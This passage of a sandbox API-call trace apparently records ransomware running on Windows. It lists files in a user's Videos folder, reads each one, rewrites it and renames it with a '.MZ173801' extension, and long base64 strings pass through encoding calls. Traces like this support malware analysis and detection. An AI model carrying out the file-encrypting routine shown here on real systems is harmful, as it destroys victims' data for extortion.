dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0119.659] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0119.659] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0119.659] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x1fba [0119.660] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0119.660] ReadFile (in: hFile=0x408, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x1fba, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f418*=0x1fba, lpOverlapped=0x0) returned 1 [0119.660] CloseHandle (hObject=0x408) returned 1 [0119.713] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\lsT2a0U oQPdx7YbeML.swf" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\lst2a0u oqpdx7ybeml.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0119.928] WriteFile (in: hFile=0x408, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x1fba, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f424*=0x1fba, lpOverlapped=0x0) returned 1 [0119.929] CloseHandle (hObject=0x408) returned 1 [0119.930] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\lsT2a0U oQPdx7YbeML.swf" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\lst2a0u oqpdx7ybeml.swf"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\lsT2a0U oQPdx7YbeML.swf.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\lst2a0u oqpdx7ybeml.swf.mz173801")) returned 1 [0119.930] GetCurrentThreadId () returned 0x1358 [0119.931] GetCurrentThreadId () returned 0x1358 [0119.931] GetCurrentThreadId () returned 0x1358 [0119.931] GetCurrentThreadId () returned 0x1358 [0119.931] GetCurrentThreadId () returned 0x1358 [0119.931] GetCurrentThreadId () returned 0x1358 [0119.931] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34620d90, ftCreationTime.dwHighDateTime=0x1d5ee60, ftLastAccessTime.dwLowDateTime=0xcd074510, ftLastAccessTime.dwHighDateTime=0x1d5e514, ftLastWriteTime.dwLowDateTime=0xcd074510, ftLastWriteTime.dwHighDateTime=0x1d5e514, nFileSizeHigh=0x0, nFileSizeLow=0x2ac8, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="PSyIQJNrBfmiC-j.swf", cAlternateFileName="PSYIQJ~1.SWF")) returned 1 [0119.931] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0119.931] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0119.931] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\PSyIQJNrBfmiC-j.swf" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\psyiqjnrbfmic-j.swf"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34620d90, ftCreationTime.dwHighDateTime=0x1d5ee60, ftLastAccessTime.dwLowDateTime=0xcd074510, ftLastAccessTime.dwHighDateTime=0x1d5e514, ftLastWriteTime.dwLowDateTime=0xcd074510, ftLastWriteTime.dwHighDateTime=0x1d5e514, nFileSizeHigh=0x0, nFileSizeLow=0x2ac8)) returned 1 [0119.931] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.931] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0119.932] GetCurrentThreadId () returned 0x1358 [0119.932] GetCurrentThreadId () returned 0x1358 [0119.932] GetCurrentThreadId () returned 0x1358 [0119.932] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.932] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0119.932] GetCurrentThreadId () returned 0x1358 [0119.932] GetCurrentThreadId () returned 0x1358 [0119.932] GetCurrentThreadId () returned 0x1358 [0119.932] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\PSyIQJNrBfmiC-j.swf" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\psyiqjnrbfmic-j.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0119.932] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0119.933] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0119.933] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x2ac8 [0119.933] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0119.933] ReadFile (in: hFile=0x408, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x2ac8, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f418*=0x2ac8, lpOverlapped=0x0) returned 1 [0119.934] CloseHandle (hObject=0x408) returned 1 [0119.934] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\PSyIQJNrBfmiC-j.swf" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\psyiqjnrbfmic-j.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0119.935] WriteFile (in: hFile=0x408, lpBuffer=0x2436c90*, nNumberOfBytesToWrite=0x2ac8, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x2436c90*, lpNumberOfBytesWritten=0x19f424*=0x2ac8, lpOverlapped=0x0) returned 1 [0119.936] CloseHandle (hObject=0x408) returned 1 [0119.937] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\PSyIQJNrBfmiC-j.swf" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\psyiqjnrbfmic-j.swf"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\PSyIQJNrBfmiC-j.swf.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\psyiqjnrbfmic-j.swf.mz173801")) returned 1 [0119.937] GetCurrentThreadId () returned 0x1358 [0119.937] GetCurrentThreadId () returned 0x1358 [0119.937] GetCurrentThreadId () returned 0x1358 [0119.937] GetCurrentThreadId () returned 0x1358 [0119.937] GetCurrentThreadId () returned 0x1358 [0119.937] GetCurrentThreadId () returned 0x1358 [0119.937] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97c673d0, ftCreationTime.dwHighDateTime=0x1d5ed11, ftLastAccessTime.dwLowDateTime=0x10f768e0, ftLastAccessTime.dwHighDateTime=0x1d5e26d, ftLastWriteTime.dwLowDateTime=0x10f768e0, ftLastWriteTime.dwHighDateTime=0x1d5e26d, nFileSizeHigh=0x0, nFileSizeLow=0x1628f, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="Tdqlc5SA.mp4", cAlternateFileName="")) returned 1 [0119.937] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0119.937] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0119.937] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\Tdqlc5SA.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\tdqlc5sa.mp4"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97c673d0, ftCreationTime.dwHighDateTime=0x1d5ed11, ftLastAccessTime.dwLowDateTime=0x10f768e0, ftLastAccessTime.dwHighDateTime=0x1d5e26d, ftLastWriteTime.dwLowDateTime=0x10f768e0, ftLastWriteTime.dwHighDateTime=0x1d5e26d, nFileSizeHigh=0x0, nFileSizeLow=0x1628f)) returned 1 [0119.938] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.938] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0119.938] GetCurrentThreadId () returned 0x1358 [0119.938] GetCurrentThreadId () returned 0x1358 [0119.938] GetCurrentThreadId () returned 0x1358 [0119.939] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.939] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 